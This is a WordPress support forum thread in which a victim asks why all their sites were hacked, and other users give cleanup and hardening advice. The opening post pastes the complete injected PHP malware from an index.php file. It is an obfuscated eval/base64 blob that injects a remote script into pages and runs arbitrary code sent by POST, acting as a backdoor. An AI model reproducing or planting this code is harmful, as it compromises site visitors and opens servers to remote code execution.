Support » Fixing WordPress » All my websites hacked ‘silence is golden’?

  • I’ve had all my websites hacked. I’m restoring a backup from a week ago but I’m not really sure what has caused it or if there is anyway of tracking how it happened. I will find someone to help me harden up the files for future protection but i would like to sort it.

    PLUGIN QUERY???
    the only new plugin i’ve added is the si-contact-form which seems to have good ratings, so i don’t imagine it’s the cause. but maybe… as it’s the only new plugin in the time that this happened. however as it spread to other websites i’m unsure

    SILENCE IS GOLDEN???
    I noticed this in an index.php file

    at the end it says Silence is golden
    does anyone know if it’s a specific hack?

    i’ve had my wordpress files hacked, plus some other php files in other directories.

    <?php eval(base64_decode('aWYoIWlzc2V0KCRzc2hrZjEpKXtmdW5jdGlvbiBzc2hrZigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJWNkxYQmhhVzUwYVc1bmFXNWpMbU52YlM5c2FXNWtlUzlwYm1SbGVDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gc3Noa2YyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHNzaGtmMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkc3Noa2YxKSljYWxsX3VzZXJfZnVuYygkc3Noa2YxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3NzaGtmJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3NzaGtmJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHNzaGtmbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignc3Noa2YyJykpIT0nc3Noa2YyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
    // Silence is golden.
    ?>

Viewing 15 replies - 1 through 15 (of 25 total)
  • The eval(base64_decode stuff is a hack.

    OK I guessed it must be. Thanks for the input. I just wish I knew where it came from

    If I delete that part will it fix things? I managed to fix my basic (non wordpress) files by deleting that part of the code. But WP has more files and that code is probably in more places.

    Any tips on how to get rid of it? I tried restoring my backup from a week ago but it doesn’t seem to be working. It’s weird as I only noticed the problem 3 days ago so I thought the backup from a week ago would be good.

    I’ve worked out which files to remove the eval(base64_decode code from and it seems to be working.

    how likely is it that i’ll be hacked again soon? my tech person says she can’t look at it for 2 weeks to “harden” up the files. i’m wondering if i should hire someone else???

    excellent thanks for that

    The guys at blue host suggest changing the names of the scripts from php to html to make it harder for the hackers. Any thoughts on this idea?

    My sites have already been hacked again. Very frustrating. I’m not very techie so it’s taking me a while to make the changes they suggest

    Lots of questions! If anyone can help I’d appreciate it

    I’ve read the instructions on restoring the files and I’m good to go, however I’m wondering how to handle the issue of multiple websites.

    I host with bluehost, and have multiple domains. Some wordpress, some aren’t but most are php based. They are all on the same ftp account. If I put a fresh site on there with the latest version of WP, will the hackers still be able to hack that, because they still have back door access to the other php files on the system?

    i.e. can I progressively restore one domain at a time, or will they get hacked if I do that? do I need instead to clear out all the php based domains?

    Also, I see that images aren’t usually hacked. What about pdf or mp3 files that I have online?

    Will my html files in other domains be okay? They don’t seem to have been hacked even though they’re on the same ftp account.

    Thanks!

    Does anyone know if I need to remove all the websites at the same time or can progressively remove clean and then replace with the latest WP?

    You definitely should change your web hosting account passwords. And this won’t help you now, but for future, you should install several plugins such as vLogger and WP Exploit Scanner:

    http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/

    WordPress Exploit Scanner

    They are all on the same ftp account.

    Be sure to change all passwords, including ftp/webhost ones. After backing up, I would do a major cleanout of all hacked sites and change all passwords so that the source of the infection is eliminated. You don’t want to have to clean up hacked sites over and over. Also see: http://codex.wordpress.org/Hardening_WordPress

    Is there some vulnerability that is allowing hackers to gain access to WP 2.8.4? I was hacked over the weekend. I am doing the delete files off the server and reupload to clean my system as well as change passwords.

    Anyone notice an increase in hacks with updated software?

    You don’t want to have to clean up hacked sites over and over.

    Yes that was my fear. So if I understand you correctly I need to install the latest version of WP on ALL websites at the same time, or it will be able to hack into WP 2.8.4?

    Is this domain reference http://ez-paintinginc.com anything to do with the hack? it seems to be on some of my html website but I can’t think how that reference got there? It appears to link to some sort of script and I am not sure if it’s another form of hack or something legit. I can’t find anything on it in google

    Thanks jonimueller and iridiax for the links 🙂

    Does anyone know if http://ez-paintinginc.com is a hack or legitimate?

    That site is apparently hacked as well. Hackers can host their scripts/files on hacked sites and then link to them on other hacked sites.

Viewing 15 replies - 1 through 15 (of 25 total)
  • The topic ‘All my websites hacked ‘silence is golden’?’ is closed to new replies.